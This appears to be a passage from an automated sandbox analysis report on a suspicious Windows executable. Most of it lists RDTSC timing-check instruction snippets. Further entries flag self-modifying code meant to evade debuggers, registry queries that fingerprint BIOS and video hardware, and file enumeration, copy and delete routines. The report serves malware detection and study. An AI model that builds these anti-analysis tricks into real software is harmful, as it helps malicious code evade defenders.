                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B8D second address: 727B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B93 second address: 727B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B98 second address: 727B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727D0D second address: 727D11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727D11 second address: 727D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728963 second address: 728986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FBF78E7B35Dh 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728986 second address: 728990 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF78ADB276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728990 second address: 7289A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF78E7B35Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729018 second address: 72901E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72901E second address: 729044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FBF78E7B35Eh 0x0000000a jl 00007FBF78E7B37Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF78E7B35Bh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729044 second address: 729048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726FDA second address: 726FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726FE0 second address: 726FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF78ADB27Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730D6A second address: 730D93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B363h 0x00000007 jne 00007FBF78E7B356h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FBF78E7B35Eh 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730D93 second address: 730D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730D97 second address: 730DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF78E7B35Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7309FE second address: 730A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730A02 second address: 730A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B365h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730A1D second address: 730A3C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FBF78ADB276h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FBF78ADB27Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7407EA second address: 7407EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740980 second address: 740984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740984 second address: 740988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740988 second address: 74098E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74098E second address: 7409A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B365h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7409A8 second address: 7409B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747908 second address: 74790C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74790C second address: 747919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747919 second address: 74791F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74791F second address: 747934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB281h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748FA7 second address: 748FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748FB5 second address: 748FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBF78ADB276h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748FBF second address: 748FE9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF78E7B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBF78E7B367h 0x00000010 jnl 00007FBF78E7B356h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758DAE second address: 758DD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Bh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FBF78ADB282h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757AD3 second address: 757AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FBF78E7B356h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757AEB second address: 757AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757AEF second address: 757B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B366h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FBF78E7B35Eh 0x00000011 js 00007FBF78E7B356h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757B21 second address: 757B2B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF78ADB276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757B2B second address: 757B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FBF78E7B356h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757B3B second address: 757B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757DF2 second address: 757E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FBF78E7B367h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B66C second address: 75B670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B670 second address: 75B682 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B682 second address: 75B686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B686 second address: 75B68E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B68E second address: 75B698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FBF78ADB276h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B1B1 second address: 75B1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B1B5 second address: 75B1DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Fh 0x00000007 jnp 00007FBF78ADB276h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007FBF78ADB27Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B1DC second address: 75B1E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B1E4 second address: 75B1F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B3CC second address: 75B3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7642F6 second address: 7642FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7642FA second address: 76431A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBF78E7B360h 0x00000008 jo 00007FBF78E7B356h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76431A second address: 76431E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76431E second address: 764322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764322 second address: 764328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 764180 second address: 764184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778202 second address: 77821E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF78ADB280h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77821E second address: 778222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778222 second address: 778226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779CFD second address: 779D25 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FBF78E7B360h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FBF78E7B35Bh 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779D25 second address: 779D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779D2B second address: 779D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D12B second address: 77D130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D130 second address: 77D13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF78E7B356h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D13C second address: 77D159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB281h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6783F2 second address: 6783FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6783FA second address: 6783FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6783FE second address: 678408 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF78E7B356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78ABE3 second address: 78AC05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FBF78ADB276h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF78ADB282h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AC05 second address: 78AC0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AD5E second address: 78AD64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AD64 second address: 78AD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AD68 second address: 78AD6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AFEE second address: 78AFFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FBF78E7B356h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B166 second address: 78B183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB289h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B183 second address: 78B1CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FBF78E7B369h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF78E7B366h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B1CE second address: 78B20D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF78ADB284h 0x00000012 jmp 00007FBF78ADB289h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B20D second address: 78B211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B489 second address: 78B48D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CE82 second address: 78CE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F9CB second address: 78F9CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F9CF second address: 78F9D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791421 second address: 791425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791425 second address: 791453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBF78E7B369h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBF78E7B35Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791453 second address: 79146C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d jne 00007FBF78ADB278h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79146C second address: 791476 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF78E7B356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF031C second address: 4DF0374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB27Fh 0x00000008 pushfd 0x00000009 jmp 00007FBF78ADB288h 0x0000000e sub esi, 130140D8h 0x00000014 jmp 00007FBF78ADB27Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBF78ADB285h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0374 second address: 4DF037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF037A second address: 4DF03C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB283h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx ebx, cx 0x00000010 push ecx 0x00000011 mov bl, B5h 0x00000013 pop esi 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 movsx ebx, si 0x0000001a mov eax, 01397A9Dh 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FBF78ADB282h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF03C0 second address: 4DF03C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF03C6 second address: 4DF03CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF03CC second address: 4DF03D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF04AC second address: 4DF04B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 501919 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 501884 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6ACE33 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6ABCD9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 737A2A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002B38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002B4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_002ADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_002AE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_002AED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_002B4570
